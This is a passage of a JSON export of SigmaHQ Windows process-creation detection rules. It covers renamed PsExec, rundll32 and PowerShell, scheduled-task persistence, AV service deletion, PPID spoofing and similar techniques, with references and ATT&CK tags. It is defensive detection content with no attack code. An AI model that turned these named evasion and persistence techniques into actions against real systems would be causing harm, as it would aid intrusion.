"https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.g0046", - "car.2013-05-009", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2019/04/17", - "filename": "proc_creation_win_renamed_paexec.yml", - "author": "Jason Lynch", - "level": "medium", - "falsepositive": [ - "Unknown imphashes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execution of a renamed version of the Plink binary", - "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", - "value": "Execution Of Renamed Plink Binary", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", - "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2022/06/06", - "filename": "proc_creation_win_renamed_plink.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed PowerShell often used by attackers or malware", - "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", - "value": "Renamed PowerShell", - "meta": { - "refs": [ - "https://twitter.com/christophetd/status/1164506034720952320", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml" - ], - "tags": [ - "car.2013-05-009", - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/08/22", - "filename": "proc_creation_win_renamed_powershell.yml", - "author": "Florian Roth, frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "value": "Renamed ProcDump", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/11/18", - "filename": "proc_creation_win_renamed_procdump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Procdump illegaly bundled with legitimate software", - "Weird admins who renamed binaries (and should be investigated)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a renamed PsExec often used by attackers or malware", - "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", - "value": "Renamed PsExec", - "meta": { - "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml" - ], - "tags": [ - "car.2013-05-009", - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/05/21", - "filename": "proc_creation_win_renamed_psexec.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software that illegaly integrates PsExec in a renamed form", - "Administrators that have renamed PsExec and no one knows why" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection", - "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2", - "value": "Renamed Rundll32.exe Execution", - "meta": { - "refs": [ - "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml" - ], - "tags": "No established tags", - "creation_date": "2022/06/08", - "filename": "proc_creation_win_renamed_rundll32.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "value": "DllRegisterServer Call From Non Rundll32", - "meta": { - "refs": [ - "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/22", - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", - "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5", - "value": "Execution of Renamed Remote Utilities RAT (RURAT)", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" - ], - "creation_date": "2022/09/19", - "filename": "proc_creation_win_renamed_rurat.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "value": "Renamed Sysinternals Sdelete Usage", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2022/09/06", - "filename": "proc_creation_win_renamed_sdelete.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "System administrator usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205", - "value": "Renamed or Portable Vmnat.exe", - "meta": { - "refs": [ - "https://twitter.com/malmoeb/status/1525901219247845376", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_renamed_vmnat.yml", - "author": "elhoim", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "value": "Renamed Whoami Execution", - "meta": { - "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2021/08/12", - "filename": "proc_creation_win_renamed_whoami.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc", - "value": "Root Certificate Installed", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ], - "creation_date": "2020/10/10", - "filename": "proc_creation_win_root_certificate_installed.yml", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "level": "medium", - "falsepositive": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "value": "Remote Procedure Call Service Anomaly", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", - "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", - "https://twitter.com/cyb3rops/status/1514217991034097664", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2022/04/13", - "filename": "proc_creation_win_rpcss_anomalies.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", - "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", - "value": "Rundll32 With Suspicious Parent Process", - "meta": { - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/05/21", - "filename": "proc_creation_win_rundll32_parent_explorer.yml", - "author": "CD_ROM_", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "load malicious registered COM objects", - "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", - "value": "Rundll32 Registered COM Objects", - "meta": { - "refs": [ - "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_rundll32_registered_com_objects.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "value": "Rundll32 UNC Path Execution", - "meta": { - "refs": [ - "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" - ], - "creation_date": "2022/08/10", - "filename": "proc_creation_win_rundll32_unc_path.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "uuid": "5bb68627-3198-40ca-b458-49f973db8752", - "value": "Rundll32 Without Parameters", - "meta": { - "refs": [ - "https://bczyz1.github.io/2021/01/30/psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2021/01/31", - "filename": "proc_creation_win_rundll32_without_parameters.yml", - "author": "Bartlomiej Czyz, Relativity", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "value": "Rundll32 Execution Without DLL File", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1481630810495139841?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/13", - "filename": "proc_creation_win_run_executable_invalid_extension.yml", - "author": "Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection", - "uuid": "1a70042a-6622-4a2b-8958-267625349abf", - "value": "Run from a Zip File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/12/26", - "filename": "proc_creation_win_run_from_zip.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "value": "Run PowerShell Script from ADS", - "meta": { - "refs": [ - "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2019/10/30", - "filename": "proc_creation_win_run_powershell_script_from_ads.yml", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell script execution via input stream redirect", - "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", - "value": "Run PowerShell Script from Redirected Input Stream", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", - "https://twitter.com/Moriarty_Meng/status/984380793383370752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/10/17", - "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", - "uuid": "bab049ca-7471-4828-9024-38279a4c04da", - "value": "Detect Virtualbox Driver Installation OR Starting Of VMs", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1564/006/", - "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", - "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.006", - "attack.t1564" - ], - "creation_date": "2020/09/26", - "filename": "proc_creation_win_run_virtualbox.yml", - "author": "Janantha Marasinghe", - "level": "low", - "falsepositive": [ - "This may have false positives on hosts where Virtualbox is legitimately being used for operations" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "value": "Suspicious Schtasks Execution AppData Folder", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2022/03/15", - "filename": "proc_creation_win_schtasks_appdata_local_system.yml", - "author": "pH-T, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "uuid": "970823b7-273b-460a-8afc-3a6811998529", - "value": "Uncommon Scheduled Task Once 00:00", - "meta": { - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml" - ], - "tags": "No established tags", - "creation_date": "2022/07/15", - "filename": "proc_creation_win_schtasks_once_0000.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Software installation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)", - "uuid": "b66474aa-bd92-4333-a16c-298155b120df", - "value": "Suspicious Powershell No File or Command", - "meta": { - "refs": [ - "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2022/04/08", - "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml", - "author": "pH-T, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "value": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2022/02/12", - "filename": "proc_creation_win_schtasks_reg_loader.yml", - "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "value": "Schtasks Creation Or Modification With SYSTEM Privileges", - "meta": { - "refs": [ - "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/07/28", - "filename": "proc_creation_win_schtasks_system.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", - "value": "Use of ScreenConnect Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_screenconnect.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the tool" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", - "value": "ScreenConnect Backstage Mode Anomaly", - "meta": { - "refs": [ - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/25", - "filename": "proc_creation_win_screenconnect_anomaly.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "value": "Script Event Consumer Spawning Process", - "meta": { - "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2021/06/21", - "filename": "proc_creation_win_script_event_consumer_spawn.yml", - "author": "Sittikorn S", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection", - "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", - "value": "Suspicious Execution of Sc to Delete AV Services", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_sc_delete_av_services.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", - "uuid": "57712d7a-679c-4a41-a913-87e7175ae429", - "value": "SC.EXE Query Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1007" - ], - "creation_date": "2021/12/06", - "filename": "proc_creation_win_sc_query.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate query of a service by an administrator to get more information such as the state or PID" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", - "value": "Possible Shim Database Persistence via sdbinst.exe", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_sdbinst_shim_persistence.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", - "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", - "value": "Sdclt Child Processes", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2020/05/02", - "filename": "proc_creation_win_sdclt_child_process.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of SDelete to erase a file not the free space", - "uuid": "a4824fca-976f-4964-b334-0621379e84c4", - "value": "Sysinternals SDelete Delete File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/06/03", - "filename": "proc_creation_win_sdelete.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "System administrator usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", - "value": "Sdiagnhost Calling Suspicious Child Process", - "meta": { - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", - "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" - ], - "creation_date": "2022/06/01", - "filename": "proc_creation_win_sdiagnhost_susp_child.yml", - "author": "Nextron Systems", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", - "value": "PPID Spoofing Tool Usage", - "meta": { - "refs": [ - "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", - "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", - "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", - "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1134.004" - ], - "creation_date": "2022/07/23", - "filename": "proc_creation_win_selectmyparent.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects manual service execution 